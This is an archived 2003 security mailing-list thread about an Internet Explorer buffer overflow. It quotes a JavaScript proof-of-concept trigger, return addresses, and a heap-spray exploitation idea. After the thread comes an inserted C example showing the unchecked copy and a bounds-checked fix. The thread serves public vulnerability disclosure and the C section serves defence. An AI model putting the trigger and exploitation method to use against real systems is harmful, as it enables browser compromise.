Full Disclosure mailing list archives
Re: Re: Internet Explorer >=5.0 : Buffer overflow
From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Mon, 30 Jun 2003 21:17:06 +0400
Dear SecurITeam BugTraq Monitoring,

It could be perfectly easy to exploit this vulnerability with alphanumeric shellcode... There are a lot of appropriate addresses, for example with jmp esp in different libraries (NT4 + IE6):

0x636e6294
0x70286161
0x70286221

etc. But the _real_ problem is it also does toupper() for all characters. So, 0x63, 0x70 etc. cannot be used. It's still possible to create shellcode, but I see no way to get control, because we have no appropriate address to overwrite EBP/ESP... So, it's impossible to exploit it in the usual way.

It's possible to put huge (few megabytes of) shellcode on the heap (just to put it in the clipboard too) and try to get something like jmp 0x20XXXXXX or jmp 0x21XXXXXX in 0x20200000 - 0x60FFFFFF and 0x7B200000 - 0x7FFFFFFF; because the heap is usually allocated somewhere in the end of 0x20XXXXXX, it looks possible... That is, we can put 8MB of jmp 0x21777777 + 8MB of NOOPs + shellcode into the clipboard and overwrite EIP with something like 0x21212121.... But this exploit will work an hour with 100% CPU load because clipboard operations are slow :)

Any suggestions?

--Wednesday, June 25, 2003, 3:05:20 PM, you wrote to dotslash () snosoft com:

SBM> Hi,
SBM> I can confirm it under Windows 2000 with IE 5.50.4807.2300
SBM> Full control over the EIP, but the shellcode cannot contain (as it currently
SBM> appears) non Alpha Numeric characters, too bad I guess.
SBM> Thanks
SBM> Noam Rathaus
SBM> CTO
SBM> Beyond Security Ltd
SBM> http://www.SecurITeam.com
SBM> http://www.BeyondSecurity.com
SBM> ----- Original Message -----
SBM> From: "KF" <dotslash () snosoft com>
SBM> To: "Digital Scream" <digitalscream () real xakep ru>
SBM> Sent: Monday, June 23, 2003 6:43 PM
SBM> Subject: Re: Internet Explorer >=5.0 : Buffer overflow
I can confirm this on Windows XP Professional version 6.0.2800.1106.xpsp2-030422-1633

0x43534c41 referenced mem at 0x43534c41

-KF

Digital Scream wrote:

<script>
wnd=open("about:blank","","");
wnd.moveTo(screen.Width,screen.Height);
WndDoc=wnd.document;
WndDoc.open();
WndDoc.clear();
buffer="";
for(i=1;i<=127;i++)buffer+="X";
buffer+="DigitalScream";
WndDoc.write("<HR align='"+buffer+"'>");
WndDoc.execCommand("SelectAll");
WndDoc.execCommand("Copy");
wnd.close();
</script>

Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew
SBM> _______________________________________________
SBM> Full-Disclosure - We believe in it.
SBM> Charter: http://lists.netsys.com/full-disclosure-charter.html

--
~/ZARAZA
Eternal memory to Saint Patrick! (Twain)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
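The defect the thread is circling around is an attribute value copied into a fixed-size buffer while being uppercased, with no length check: the PoC script writes 127 'X' plus "DigitalScream" (140 bytes) into the HR align attribute, and the toupper() pass is why only alphabetic bytes survive. The following C is an added illustration of that pattern and its fix; it is not IE's code and not code from anyone in the thread. The 128-byte buffer size (ALIGN_MAX) is an assumption, since the thread never states the real size, only that 140 bytes overflow it.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of the attribute buffer; the thread does not give IE's real
   size, only that 127 'X' + "DigitalScream" (140 bytes) overflows it. */
#define ALIGN_MAX 128

/* Vulnerable pattern (illustration, not IE's code): the attribute value is
   copied into a fixed-size buffer while being uppercased, with no bound on
   the index. A value of ALIGN_MAX bytes or more writes past the end of out.
   Kept only to show the defect; nothing below calls it. */
void copy_align_unchecked(const char *value, char out[ALIGN_MAX]) {
    size_t i = 0;
    while (value[i] != '\0') {
        out[i] = (char)toupper((unsigned char)value[i]);   /* i is unbounded */
        i++;
    }
    out[i] = '\0';
}

/* Hardened copy: rejects values that do not fit together with the
   terminator, otherwise uppercases into out. Returns 0 on success, -1 if
   rejected. Rejecting (rather than silently truncating) keeps the caller
   aware that the input was malformed. */
int copy_align_checked(const char *value, char *out, size_t outsz) {
    size_t len = strlen(value);
    if (outsz == 0 || len >= outsz)
        return -1;
    for (size_t i = 0; i < len; i++)
        out[i] = (char)toupper((unsigned char)value[i]);
    out[len] = '\0';
    return 0;
}

/* Builds the value the PoC script produces: 127 'X' followed by
   "DigitalScream". Returns its length (140), or 0 if buf is too small. */
size_t build_poc_value(char *buf, size_t bufsz) {
    const char *tail = "DigitalScream";
    size_t n = 127 + strlen(tail);
    if (bufsz < n + 1)
        return 0;
    memset(buf, 'X', 127);
    memcpy(buf + 127, tail, strlen(tail) + 1);
    return n;
}

/* Wrappers returning values a reader or test can check directly. */
int align_value_accepted(const char *value) {
    char out[ALIGN_MAX];
    return copy_align_checked(value, out, sizeof out) == 0;
}

int align_value_uppercases_to(const char *value, const char *expected) {
    char out[ALIGN_MAX];
    if (copy_align_checked(value, out, sizeof out) != 0)
        return 0;
    return strcmp(out, expected) == 0;
}

/* Is a value made of n 'a' characters accepted? (n < 512) */
int align_value_of_length_accepted(size_t n) {
    char value[512];
    if (n >= sizeof value)
        return 0;
    memset(value, 'a', n);
    value[n] = '\0';
    return align_value_accepted(value);
}

int poc_value_accepted(void) {
    char value[256];
    if (build_poc_value(value, sizeof value) == 0)
        return 0;
    return align_value_accepted(value);
}

int main(void) {
    char value[256];
    size_t n = build_poc_value(value, sizeof value);
    printf("PoC attribute value is %zu bytes; checked copy %s it\n",
           n, align_value_accepted(value) ? "accepts" : "rejects");
    printf("\"center\" accepted=%d, uppercased to CENTER=%d\n",
           align_value_accepted("center"),
           align_value_uppercases_to("center", "CENTER"));
    return 0;
}
```

The boundary cases are the ones worth checking in a parser of this shape: a 127-byte value fits with its terminator, a 128-byte value does not, and the 140-byte PoC value is refused before any byte is written.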
Current thread:
- Re: Internet Explorer >=5.0 : Buffer overflow SecurITeam BugTraq Monitoring (Jun 25)
- Re: Re: Internet Explorer >=5.0 : Buffer overflow Philippe Biondi (Jun 25)
- RE: Re: Internet Explorer >=5.0 : Buffer overflow Rick (Jun 25)
- Re: Re: Internet Explorer >=5.0 : Buffer overflow 3APA3A (Jun 30)